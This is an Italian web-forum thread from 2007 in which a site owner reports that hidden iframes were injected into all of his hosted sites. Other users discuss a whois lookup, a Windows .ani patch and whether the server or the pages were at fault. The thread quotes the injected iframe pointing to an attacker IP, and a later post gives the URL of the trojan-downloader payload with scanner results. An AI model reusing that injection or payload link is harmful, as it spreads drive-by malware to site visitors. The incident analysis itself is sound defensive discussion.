Utility
Home Messaggi odierni FAQ Ricerca avanzata Lo staff del forum Regolamento Utenti Archivio
Pagina 1 di 2 1 2 ultimoultimo
Visualizzazione dei risultati da 1 a 10 su 13
  1. 30-04-2007, 11:28 #1
    andropoff
    andropoff non è in linea
    Guest
    Registrato dal
    Jan 2004
    Messaggi
    627

    attacco a siti internet

    nell'weekend tutti i siti che ho presso un provider, che evito di nominare per 'correttezza', sono stati attaccati e mi sono trovato all'interno di ogni pagina che fosse index, banner, footer, o login una stringa di questo tipo subito dopo il tag <body>:

    codice:
    <iframe src='http://58.65.239.180/' width='1' height='1' style='visibility: hidden;'></iframe>
    vorrei capire se questo tipo di attacco può essere 'colpa' del del sito internet e di come è fatto (che varia da siti in asp con access, a php con mysql, a html puro) o se è imputabile esculsivamente ad un problema di server sul quale io ovviamente non posso intervenire.

    leggevo su un forum che il sito di vecchioni è stato attaccato nella medesima maniera... controllo sul nic e scopro che è il mio stesso manteiner...

    qualcuno ci ha avuto a che fare con sto coso?!
    Rispondi quotando Rispondi quotando
  2. 30-04-2007, 11:38 #2
    tognazzi
    tognazzi non è in linea
    Utente di HTML.it L'avatar di tognazzi
    Registrato dal
    Jan 2007
    Messaggi
    1,489
    http://www.pcalsicuro.com/main/2007/...nerabilita-ani

    sull'argomento.
    Rispondi quotando Rispondi quotando
  3. 30-04-2007, 11:44 #3
    tognazzi
    tognazzi non è in linea
    Utente di HTML.it L'avatar di tognazzi
    Registrato dal
    Jan 2007
    Messaggi
    1,489
    EDIT

    l'indirizzo ip è di hong kong.
    http://www.apnic.net/
    l'ente che fa lo whois per l'asia.

    lo whois:

    % [whois.apnic.net node-1]
    % Whois data copyright terms http://www.apnic.net/db/dbcopyright.html

    inetnum: 58.65.232.0 - 58.65.239.255
    netname: HOSTFRESH
    descr: HostFresh
    descr: Internet Service Provider
    country: HK
    admin-c: PL466-AP
    tech-c: PL466-AP
    status: ALLOCATED PORTABLE
    mnt-by: APNIC-HM
    mnt-lower: MAINT-HK-HOSTFRESH
    mnt-routes: MAINT-HK-HOSTFRESH
    remarks: Please send Spam & Abuse report to
    remarks: abuse@hostfresh.com
    remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    remarks: This object can only be updated by APNIC hostmasters.
    remarks: To update this object, please contact APNIC
    remarks: hostmasters and include your organisation's account
    remarks: name in the subject line.
    remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
    changed: hm-changed@apnic.net 20060612
    changed: hm-changed@apnic.net 20060613
    changed: hm-changed@apnic.net 20061018
    source: APNIC

    person: Piu Lo
    nic-hdl: PL466-AP
    e-mail: ipadmin@hostfresh.com
    address: No. 500, Post Office, Tuen Mun, N.T., Hong Kong
    phone: +852-35979788
    fax-no: +852-24522539
    country: HK
    changed: ipadmin@hostfresh.com 20070329
    mnt-by: MAINT-HK-HOSTFRESH
    source: APNIC
    Rispondi quotando Rispondi quotando
  4. 30-04-2007, 11:50 #4
    tognazzi
    tognazzi non è in linea
    Utente di HTML.it L'avatar di tognazzi
    Registrato dal
    Jan 2007
    Messaggi
    1,489
    la vulnerabilità sfruttata dal viruz è relativa ai file .ani.
    microsoft ha fatto una patch contro quella vulnerabilità:
    http://www.microsoft.com/technet/sec.../MS07-017.mspx
    Rispondi quotando Rispondi quotando
  5. 30-04-2007, 11:53 #5
    andropoff
    andropoff non è in linea
    Guest
    Registrato dal
    Jan 2004
    Messaggi
    627
    Originariamente inviato da tognazzi
    la vulnerabilità sfruttata dal viruz è relativa ai file .ani.
    microsoft ha fatto una patch contro quella vulnerabilità:
    http://www.microsoft.com/technet/sec.../MS07-017.mspx
    quindi dovrebbe essere un problema del server e non del sito in se stesso.. giusto?!
    Rispondi quotando Rispondi quotando
  6. 30-04-2007, 11:58 #6
    tognazzi
    tognazzi non è in linea
    Utente di HTML.it L'avatar di tognazzi
    Registrato dal
    Jan 2007
    Messaggi
    1,489
    Originariamente inviato da andropoff
    quindi dovrebbe essere un problema del server e non del sito in se stesso.. giusto?!
    mmh. non saprei. se ho capito bene il senso della tua domanda è: è possibile modificare i contenuti del sito per impedire al viruz di sfruttare quella vulnerabilità? per me è difficile rispondere. giro la domanda agli altri.
    Rispondi quotando Rispondi quotando
  7. 30-04-2007, 12:48 #7
    andropoff
    andropoff non è in linea
    Guest
    Registrato dal
    Jan 2004
    Messaggi
    627
    Originariamente inviato da tognazzi
    mmh. non saprei. se ho capito bene il senso della tua domanda è: è possibile modificare i contenuti del sito per impedire al viruz di sfruttare quella vulnerabilità? per me è difficile rispondere. giro la domanda agli altri.
    no, la mia domanda è :

    sono risuciti nell'attaccao perchè il sito è fatto male e vulnerabile (sono circa 100 , tra asp e access, asp e mysql, php e mysql, html puro) oppure perchè IL SERVER è fatto male e vulnerabile?!

    sto cercando di capire se può essere una colpa del ns sviluppo o del ns provider.

    visto che ne abbiamo altro sotto altri provider e la cosa non è mai accaduta mentre su questi è la seconda volta, voglio capire questo...
    Rispondi quotando Rispondi quotando
  8. 30-04-2007, 13:32 #8
    Habanero
    Habanero non è in linea
    Moderatore di Sicurezza informatica e virus L'avatar di Habanero
    Registrato dal
    Jun 2001
    Messaggi
    9,782
    in questi casi è più probabile una vulnerabilità nelle pagine...

    recentemente è stata aperta una discussione analoga alla tua:
    http://forum.html.it/forum/showthrea...readid=1117454

    bisognerebbe analizzare i log di accesso al webserver per una analisi precisa...
    Leggi il REGOLAMENTO!

    E' molto complicato, un mucchio di input e output, una quantità di informazioni, un mucchio di elementi da considerare, ho una quantità di elementi da tener presente...
    Drugo
    Rispondi quotando Rispondi quotando
  9. 30-04-2007, 14:29 #9
    andropoff
    andropoff non è in linea
    Guest
    Registrato dal
    Jan 2004
    Messaggi
    627
    Originariamente inviato da Habanero
    in questi casi è più probabile una vulnerabilità nelle pagine...

    recentemente è stata aperta una discussione analoga alla tua:
    http://forum.html.it/forum/showthrea...readid=1117454

    bisognerebbe analizzare i log di accesso al webserver per una analisi precisa...
    si ma si tratta di pagine di vario tipo che spaziano da php con mysql a pagine in html che presentano un logo basta..

    che tipo di vulnerabilità può avere una pagina di questo tipo?!
    Rispondi quotando Rispondi quotando
  10. 30-04-2007, 15:25 #10
    holifay
    holifay non è in linea
    Utente di HTML.it L'avatar di holifay
    Registrato dal
    May 2005
    Messaggi
    1,330
    per curiosità ho seguito il link

    il primo iframe apre una pagina con javascript criptato che a sua volta apre altri 6 iframe linkati rispettive pagine php sul server, che generano con altrettanti javascript criptati per scaricare ed eseguire questo file

    hllp://64.62.137.149/~edit/it/load.exe

    AhnLab-V3 2007.4.30.1 04.30.2007 no virus found
    AntiVir 7.4.0.15 04.30.2007 TR/Dldr.Nurech.AZ.5
    Authentium 4.93.8 04.27.2007 no virus found
    Avast 4.7.981.0 04.30.2007 Win32:Nurech-AF
    AVG 7.5.0.467 04.30.2007 Downloader.Generic4.FYI
    BitDefender 7.2 04.30.2007 no virus found
    CAT-QuickHeal 9.00 04.30.2007 no virus found
    ClamAV devel-20070416 04.30.2007 Trojan.Downloader-5950
    DrWeb 4.33 04.30.2007 Trojan.DownLoader.21558
    eSafe 7.0.15.0 04.30.2007 no virus found
    eTrust-Vet 30.7.3606 04.30.2007 no virus found
    Ewido 4.0 04.30.2007 no virus found
    FileAdvisor 1 04.30.2007 no virus found
    Fortinet 2.85.0.0 04.30.2007 no virus found
    F-Prot 4.3.2.48 - no virus found
    F-Secure 6.70.13030.0 04.30.2007 Trojan-Downloader.Win32.Nurech.az
    Ikarus T3.1.1.5 04.30.2007 Trojan-Downloader.Win32.Nurech.az
    Kaspersky 4.0.2.24 04.30.2007 Trojan-Downloader.Win32.Nurech.az
    McAfee 5019 04.27.2007 Downloader-BBS
    Microsoft 1.2405 04.30.2007 TrojanDownloader:Win32/Agent.XC
    NOD32v2 2231 04.30.2007 a variant of Win32/TrojanDownloader.Nurech.NAT
    Norman 5.80.02 04.30.2007 W32/DLoader.CRDC
    Panda 9.0.0.4 04.30.2007 no virus found
    Prevx1 V2 04.30.2007 Polynomial.Code.Exploit
    Sophos 4.17.0 04.28.2007 no virus found
    Sunbelt 2.2.907.0 04.19.2007 no virus found
    Symantec 10 04.30.2007 Downloader
    TheHacker 6.1.6.095 04.15.2007 no virus found
    VBA32 3.11.4 04.30.2007 Trojan.DownLoader.21558
    VirusBuster 4.3.7:9 04.29.2007 no virus found
    Webwasher-Gateway 6.0.1 04.30.2007 Trojan.Dldr.Nurech.AZ.5
    Pensi di avere un file infetto? Invialo a SuspectFile
    Rispondi quotando Rispondi quotando
« Discussione precedente | Prossima discussione »

Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire repliche
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  

Regole del Forum

Powered by vBulletin® Version 4.2.1
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved.